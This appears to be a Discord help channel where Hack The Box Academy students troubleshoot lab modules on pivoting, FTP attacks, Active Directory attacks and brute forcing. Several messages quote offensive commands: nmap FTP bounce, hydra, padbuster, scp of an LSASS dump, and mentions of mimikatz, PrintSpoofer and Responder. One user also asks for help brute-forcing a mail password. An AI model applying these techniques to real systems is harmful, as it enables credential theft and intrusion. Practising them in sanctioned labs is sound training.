I've just barely started it. Completed 2 modules and it's quite nice

craggy hound
sick fable
sly kelp
sly kelp
#

Anyone to help me on this ?

sly kelp
echo roost
#

i'll be happy to help once I get there m8

sly kelp
#

Am trying to figure

#

Out if there is anything I can do to understand the issue

vital adder
vital adder
vital adder
sly kelp
vital adder
#

which section?

sly kelp
#

Port forwarding with windows :Netsh

#

Under pivot around Obstacles

#

Last Question

vital adder
#

you have an connection error try scanning that port to see if you even have access

#

also with pivot method like this one you desperately can't ping

sly kelp
#

I even changed the port

#

from 9090 and same issue

vital adder
#

what port you are using isn't really important

#

the main thing if you have tunnel setup right or not

sly kelp
vital adder
#

look about right nmap show anything?

sly kelp
#

Let me try that as well

vital adder
#

that should be the first thing you try after the rdp failed 🤣

sly kelp
vital adder
#

it's would be way more easier to debug knowing if you even have a connect to the target or not

vital adder
#

i didn't put "nmap" in that sentence so my bad (jk)

sly kelp
#

8080 is closed

#

9080 as well

vital adder
# sly kelp

just notice your ip that's the issue, for listenaddress= use the given target machine ip not your 🤣

sly kelp
#

NO WAYY

vital adder
#

like if you think about it the how can you set the listen address to your kali because the given target doesn't have access or privilege to do that

sly kelp
#

I am extremely dumb man

#

i can not believe

vital adder
#

no worries everything make dump mistakes

sweet trellis
# vital adder try `sudo mount -t nfs (ip):/ /mnt -o nolock`

Hmm that is giving me the same error. I think it may be a problem with my VPN connection. I'm able to hit the server with ping and nmap, but my device IP is not in the same subnet. I imagine that may cause issues with permissions. Spinning up a VM now in the HTB subnet.

dusky halo
#

has anyone ran into issues interacting with machines over SSH? I'm consistently getting them to hang to the point of needing to kill the terminal tab anytime they have to send more than a few bytes' worth of data

#

I think I checked just about everything on my side; I have a stable connection, VPN is working too, ping and traceroute aren't showing any issues either (fwiw, this is the skills assessment for buffer overflows on x86 Linux)

sly kelp
#

This is the Certified dump moment for me I will remember this whole life

lusty thicket
brisk geode
#

can anyone kindly help me with the log rotate section of linux priv sec module?

rich wraith
#

How to take notes most effectively? I use Obsidian and is it good if I take notes like this and manage my notes in tree structures?

autumn hawk
#

idk how to hack at all can anyone teach me

#

somone pls dm me to help

vital adder
#

read the #rules if you generally want to learn cyber security then:

compact patrolBOT
undone narwhal
undone narwhal
brisk geode
undone narwhal
#

yeah sure

dusky halo
wide oak
#

Hey guys,

I'm stuck on the Attacking Enterpresi Networks - Lateral Movement module. I have added the ilfserveradm user to the admin group but I still can't run PS nor mimikatz as Administrator. Ilfserveradm credentials don't seem to work :(. Not sure if I'm missing something..

jade shoal
#

There are quite a few times where the module instructs you to go to the bottom to start the target; if I'd like to suggest the ability to start the target from the sidemenu (where I can start the pwnbox) - where would I do that ?

real hill
#

The GPP-Password lab does not seem to execute the specified powershell script in the Windows Attack and Defense module, is there any help available? 🙂

#

Re-importing the module did the trick 🙂

solid wedge
#

I have a question working on a lab I used to copy paste the target from the module into the HTB machine on the site but now I can't any solutions to this

jade shoal
tender lake
#

Just a sanity check, but have any of you recently done sqlmap essentials recently, because I just found a flag from the flag5 table that I couldn't submit.

I ended up changing one of the characters in the flag text to make more sense, and that was submitted just fine. ||something_something_r19k_something_something -> something_something_r15k_something_something||

craggy hound
short hare
#

ATTACKING COMMON SERVICES: Attacking FTP
Question 2:
What username is available for the FTP server?

After nmap scan anonymous login is allwoed, so running this command
nmap -Pn -v -p80 -b anonymous:@<target IP:2121> <pwnbox ton0 ip>
OR
nmap -Pn -v -p22 -b anonymous:@<target IP:2121> <pwnbox ton0 ip>

After running above gives this :
Connected:Login credentials accepted by FTP server!
Initiating Bounce Scan at 05:13
Your FTP bounce server doesn't allow privileged ports, skipping them.
And you didn't want to scan any unprivileged ports. Giving up.
QUITTING!

Can anybody help me where I am wrong?

silver mesa
short hare
short hare
tidal mango
short hare
silver mesa
#

Have you find the valid creds ?

short hare
silver mesa
#

Nope, With this files user.list and pws.list .

short hare
#

ok got in line...

short hare
silver mesa
#

nope

#

try with hydra

short hare
tranquil axle
short hare
# silver mesa try with hydra

I found the user name by hit and trial from the list but to find it's corresponding password used this:
hydra -l xxxx -P pws.list ftp://<target ip>:2121 -V
But it gives no password..

What I am doing wrong?

coarse void
#

im guessing u got the wrong username

short hare
tender lake
coarse void
#

@short hare have u checked the ftp service using anonymous access ?

tranquil axle
tender lake
short hare
coarse void
#

anonymous user doesn't need a password

short hare
coarse void
#

u didn't specify the port

fathom pendant
#

^

#

ftp ip port

short hare
coarse void
#

also vpn connection

fathom pendant
#

You're probably still connected to ftp in a different background session

#

Ping the ip

short hare
short hare
short hare
fathom pendant
#

You are backgrounding the processes without knowing what it's actually doing

#

Try
ftp anonymous@ip port

short hare
fathom pendant
#

Ah

#

Yeah ftp doesn't do user@

#

Should be just ftp ip port

short hare
fathom pendant
#

Your old target probably died

short hare
#

seriously just tried feew miniutes back it refused

short hare
fathom pendant
plush swan
#

Hi anyone done with zipping machine?

fathom pendant
plush swan
#

Okay thanks

fathom pendant
short hare
#

Thanks for the support..!!
@fathom pendant @coarse void @silver mesa @tidal mango

long anvil
#

hi guys i have stucked with this question "using the skills acquired in this and previous sections, access the target host and search for the file named 'waldo.txt' " it is on windows command line module

#

i can't find waldo.txt anywhere

#

any tips or help?

coarse void
#

use the find command

long anvil
#

i have used " where /R C:\ waldo.txt

#

but it's shown could not find files for the given pattern(s).

#

i fill the blank answer with that result but still not the right answer

coarse void
#

mb didn't saw it was for windows

#

where is the right command

thorn urchin
coarse void
barren apex
#

I just finished the sqlmap skills assesment, I managed to get the ||tamper script || mostly with pot luck, is there anyway to narrow down which one to use?

shut wraith
shut wraith
barren apex
#

sure

shut wraith
#

Thanks

raven locust
#

hey guys, little stuck on the payload & shells module, specifically at the part where it concerns PHP web shells -- anyone able to help me out in dms?

#

tl;dr is that my website does not seem to recognise the directory on the rconfig server despite the shell file showing as uploaded on the database

raven locust
#

never mind i am insanely stupid

twilit gull
#

Hey All, Could you help me with completing HTTPS/TLS attack skills assessment

acoustic owl
shut wraith
latent mesa
#

hey , on windows priv esc , Citrix Breakout section Im getting an error trying to import a module : PS C:\Users\pmorgan\Desktop> Import-Module .\PowerUp.ps1
error : import-module : the specified module ‘PowerUp.ps1’ was not loaded because no valid module file was found in any module directory

silver mesa
#

Hi, currently working on Login Brute Forcing https://academy.hackthebox.com/module/57/section/516
Skills Assessment -Service login
I have found the employee and I created users list with username anarchy and passwd list with cupp.
Im doing mistake with filtering passwords according to conditions. can any help me with this

latent mesa
#

do u have any idea ?

#

it's about the second question of citrix section : Submit the Administrator's flag from C:\Users\Administrator\Desktop

twilit gull
twilit gull
# acoustic owl What exactly is not working?

padbuster http://94.237.59.206:43498/token ||"0e0d74356da663454101d805584b6190eb57e7e30d9817ecfbf7973c9ab5df54f46a586de5c8693203896946088172a3"|| 16 -encoding 2 -cookies ||"token=0e0d74356da663454101d805584b6190eb57e7e30d9817ecfbf7973c9ab5df54f46a586de5c8693203896946088172a3||"-error " Decryption Error. Invalid Token! " -usebody
This is what I'm using

modern kestrel
#

hi

rustic sage
acoustic owl
wispy aspen
rustic sage
#

hmmm which one do you have in mind when dumping NTDS

wispy aspen
rustic sage
#

ahhh right

#

thanks

twilit gull
sonic seal
#

Hello everyone. I'm stuck in the last 2 questions of AD Skill_2: Submit the contents of the flag.txt file on the Administrator desktop on the DC01 host.

I have the credentials of the user with GenericAll user and I try to ACL abuse but PowerView module doesn't work... I try the module in MS01, SQL01 and my kali using proxychains but all times the same erro.

Can anyone to help me?

acoustic owl
vital adder
stoic dove
#

After SELinux enforcing it blocks network interfaces

I have installed SELinux on an Ubuntu Pro Server with the following packages:

policycoreutils, selinux-utils, selinux-basics

The problem appears when I set SELinux policy to “enforcing”. My system loses network capabilities; when I run ‘ip addr show’ the only interface displayed is the loopback interface

Did anyone experience the same?
How did you overcome it?

Thanks.

magic jay
#

anyone has any mail password cracking bruteforce

#

ik half of the password

#

and the number of digits

#

on 2 words in the password are missing

#

it is my old ID

craggy hound
#

🤨

vital adder
craggy hound
#

Lol

flint chasm
#

Hi all
Could you please give me a hint were I can find the URL of the WordPress instance? (Attacking Common Applications
Attacking Common Applications - Skills Assessment II)

#

I done all another questions and skill assessments but still can't find this one

vital adder
#

if you've i answer the rest of the questions for that assessments then did you found the wordpress site?

#

also the answer format for this is http://(domain) with http:// and without the / at the end

flint chasm
#

u mean wp-admin?

heady sandal
#

how do I connect to the support chat , after pushing the 'contact support' button?

olive cloak
#

KOPRC\

#

admin ?

#

.yc Xec

#

uulyd

vital adder
#

read #welcome and #rules keep spamming and you'll get the 👢 up your ass

vital adder
leaden pond
#

I'm working on Attacking Common Services Lab Hard. I was able to RDP into the target system with credentials I found. I then found an XML file containing a string in the format of a flag: "HTB_......." But that flag isn't accepted as the answer. Is it just a decoy flag?

potent grail
#

Hello everyone
I have a problem, I'm going through the active directory module and there is such a problem.When I spawn instance and try to connect via rdp, I get such a black screen.At first I tried in my own kali, then I tried with attak box and restarted a couple of times

potent grail
leaden pond
vital adder
# potent grail v

not sure if this will work but try with these 2 flag /cert:ignore /dynamic-resolution

vital adder
#

nice 👍 👍

solid wedge
heady sandal
vital adder
#

are you on academy or main platform?

heady sandal
#

how do I know that? not sure...

#

Im new. got the vip subscription

vital adder
vital adder
swift locust
#

im a hacker

vital adder
#

i'm a ass eater

undone narwhal
swift locust
#

LMFAOO MFAL FAOM FAL MFAO LFAMO

rustic sage
#

guess what guys

#

Chicken but 🤠

low swallow
#

anyone there

pulsar needle
#

AD Enumeration & Attacks - Skills Assessment Part II. ||There is litterly nothing on the two users I can login as on the RDP, nothing on that computer||

low swallow
#

how can i hack a website im just starting out

pulsar needle
#

Why do you want to know🧐

#

Lol jk, the hacking bible or whatever its called

vital adder
low swallow
trail leaf
lusty thicket
trail leaf
vital adder
low swallow
vital adder
low swallow
vital adder
low swallow
pulsar needle
vital adder
#

ok hint try enum windows servers with the cred that you already have

vital adder
compact patrolBOT
pulsar needle
#

There are like 1000 computers, like 7 with SPN enabled(None of which i was able to crack the password off), should I take a break or is there something obvious I dont see?

vital adder
#

there is 3 target machine 🤣 also how the tf did you get 1000?

pulsar needle
#

Weelelllelelel i mean domain computers

#

lmao

#

Importing powerview and running "Get-DomainComputer"

vital adder
#

maybe try with something like ping sweep first next time 🤣

vital adder
low swallow
low swallow
lusty thicket
#

each module is divided into sections(like topics)

low swallow
#

ok

lusty thicket
#

you just have to enter the name of the first ||section||

low swallow
#

thx

low pivot
#

Hey Guys I am new here
My name is Nithish
I want to become an Ethical Hacker
Can anyone guide from where to start ?
I am good at programming languages like Java and Python

vital adder
compact patrolBOT
vital adder
leaden pond
#

I'm working on the Dynamic Port Forwarding with SSH and SOCKS Tunneling section of the Pivoting, Tunneling, and Port Forwarding module. I can't get dynamic port forwarding to work to be able to RDP into the target. I can't run any commands with proxychains, even though I ran the command ssh -D 9050 ubuntu@<TARGET IP> and the correct final line is in /etc/proxychains.conf. I have tried multiple VPN files (US Academy 1 and US Academy 3), but neither seems to work. Looking through the forums, it looks like lots of people ran into the same issue. Does anyone know of a workaround?

#

Trying from Pwnbox right now to see if that might help.

#

Same exact error on pwnbox

#

Never mind, I was able to figure it out. It was an error on my part. I didn't realize I had to stay SSHed into the ubuntu machine. I was running the ssh -D 9050 ubuntu@<TARGET IP> command and then killing the connection with the SSH server.

patent sphinx
#

im i am just looking for some help on the machine cozyhosting. i've gotten to the login page, unfortunately i don't know what to do next

patent sphinx
fickle fiber
#

just curious, I'm not a content creator but are people allowed to stream the content of modules?

hexed void
#

don't you hate when you get a right answer, and have no idea how you got it

sly kelp
#

And yes I agree

hexed void
#

I just got the right answer, but literally don't understand it, kicks chatgpts ass too

#

is there a better coding ai than chatgpt?

sly kelp
#

What module or question you are talking about

hexed void
#

filter contents in linux basics

#

Use cURL from your Pwnbox (not the target machine) to obtain the source code of the "https://www.inlanefreight.com" website and filter all unique paths of that domain. Submit the number of these paths as the answer.

#

the correct answer is 34 lol

#

when ChatGPT ran the same code, they got 34.

foggy light
#

Module: DACL Attacks I
Section: Granting Rights and Ownership
Question: Lilia has the WriteDacl access right over the account Kendra. Abuse this access right to gain access to the shared folder \DC01\Kendra and submit the contents of flag.txt as the answer.
I have added the write permission but I still cant perform dcsync. Is this a bug or am I doing something wrong?

trail leaf
kind turret
vagrant perch
#

, ,Please I am just starting the academy and I have been stuck on this question (Service and Process Management) for two days now. I have tried all I know. Can someone lend a helping guide? Use the "systemctl" command to list all units of services and submit the unit name with the description "Load AppArmor profiles managed internally by snapd" as the answer.

sly kelp
#

Maybe easy method it create a shared folder inside virtual box from host to VM and import the file to host OS (windows) and add it as virtual drive

lusty thicket
vagrant perch
#

Also tried AppArmor

#

Answer should be apparmor.service from the information but it is wrong

lusty thicket
vagrant perch
#

Yesh. I used this and got the only AppArmor option as apparmor.service but still said its wrong answer

wheat garden
#

Any one here do attacking common applications module stuck on section "Other Notable Applications"

first question "Enumerate the target host and identify the running application. What application is running? "

wheat garden
cunning prairie
wheat garden
#

I ended up opening it on windows. after downloading the .vhd I was able to mount it just using windows GUI. I dont recall having trouble with it windows recognized the data type and was just able to right click and mount it.

wheat garden
vagrant perch
cunning prairie
paper rivet
#

Hi, I'm in module "Web Requests" -> "CRUD API". Anyone can help me please? I follow the steps but the ||JSON is void|| 😦

wheat garden
#

sure

fathom pendant
#

Did you try the dislocker method in that article?

royal sigil
#

hello i make the skill assesement of the file inclusion , i have acces to the admin panel but i dont find the othe lfi can you give me hint .

wheat garden
wheat garden
twin canyon
#

Agree - "where" is the obvious one word command - not sure why the module won't accept that answer.

twin canyon
#

Yeah - I can't find the one word Splunk Command either that it will accept. I tried every Command mentioned in the modules

silver mesa
#

Hi guys, Im in Login Brute Forcing - Skills Assessment service login. Im stuck on getting passwd for SSH.
So far, I tried

  1. created User list and passwd list
  2. filtered according to the condition.

Any one, so I can clarify what mistake im doing.

silver mesa
#

NVM, I got it.

rustic sage
#

Hello everyone im in ATTACKING COMMON APPLICATIONS in the section Other Notable Applications, im tring to get the flag of the second questio using CVE 2020-14*** with a Python Script but it sees nothing, can anybody help me ?

chrome vapor
#

hi

#

how to get rank here? i want send pic about my problem i am subscriber

languid dawn
#

there's literally a splash screen that explains everything when you join lemonthink_hd

tulip dragon
#

why windows file upload module seems very hard for me

#

linux was ez

chrome vapor
#

i dont get anything when use this commend

acoustic owl
tulip dragon
#

hmm i am not good with powershell

#

i will practice more on it

chrome vapor
pulsar needle
#

Attacking AD skill assessment part 2, ive looked into the ||SQL01|| host and I found nothing, I tried running ||Responder|| and got nothing, so i tried to enumerate the local host and found nothing of interest... I am stuck lol (Q8)

#

Yes...

#

But idk what more to enumerate? AAA

#

Mimikatz

#

But I tried responder and got nothing

acoustic owl
silver mesa
pulsar needle
#

Ok

#

When you thought you had it lmao

pulsar needle
#

I tried running ||scp lsass.dmp htb-student@172.16.7.240:/home/htb-student|| on the windows host in order to get the LSASS file, but I am not able to, it just hangs up...

pulsar needle
#

I tried lazagne aswell

#

I cant get anywhere

#

I got a "not ok for masterkey" error

naive wadi
#

I'm doing Kerberoasting - from Linux in Active Directory Enumeration & Attacks. I've cracked the TGS, but when I enumerate the users Groups VIA RPCClient to answer this questions "What powerful local group on the Domain Controller is the SAPService user a member of? " it's not the correct group. I have tried running powershell commands via a credentialed crackmap session but they are not executing. Unsure of how to answer this, any pointers?

warm drift
#

I can't post screenshots for some reason

lusty thicket
warm drift
lusty thicket
warm drift
warm drift
#

it give's lots of errors this is one "Bundler::PermissionError: There was an error while trying to write to /var/lib/gems/3.1.0/cache/ecdsa-1.2.0.gem. It is likely that you need to grant write
permissions for that path."

lusty thicket
warm drift
lusty thicket
#

you can check if you actually have permission to write to that directory with ||ls -l /var/lib/gems/3.1.0/cache/||

warm drift
lusty thicket
warm drift
#

idk maybe I should just skip the module I don't want to alter my linux settings and stuff by doing these custom installs

stoic dove
#

Please I’m have issues with SELinux, after setting to enforcing mode, and then rebooting, my machine can’t access network interface, please help

rustic sage
#

do you have tried to use proxychains?

#

somebody knows a windows util (.exe) that i can use to read a file??¿?

pulsar needle
naive wadi
frank seal
#

Hey would I be able get some help on Q7 of AD Enum Skills 2? Currently I have user the user for ||SQL01 and have used mssqlclient.py to log in and have SEImpersonate etc||, but I keep having errors with ||PrintSpoofer. Whenever I execute it with any command other than whoami, I get CreateProcessAsUser() failed. Error: 2 ||

undone narwhal
undone narwhal
undone narwhal
frank seal
undone narwhal
#

no not really

#

can you send a screenshot

frank seal
#

Am I allowed to send photos here? or DM?

undone narwhal
#

yeah you can send screenshots here, dm is also fine

timber phoenix
#

Kali Linux

pulsar needle
#

i dont think there is a log

undone narwhal
pulsar needle
undone narwhal
#

you have to run responder on linux host

trail leaf
#

There is a Responder for Windows but I think it's still in development iirc

#

Inveigh should be sufficient for any poisoning you need to do from Windows

pulsar needle
#

So I have to use the Windows host as a pivot host then?

trail leaf
#

no one said anything about pivot hosts

pulsar needle
#

But the thing is I ran Responder as the normal user before I even had access to this host

trail leaf
#

I don't know if you can poison from a nonadmin account because of what you need to have open but don't quote me on that

pulsar needle
#

Like I already have this information

#

I am on question 8 (In the AD attacks module skill assessment 2)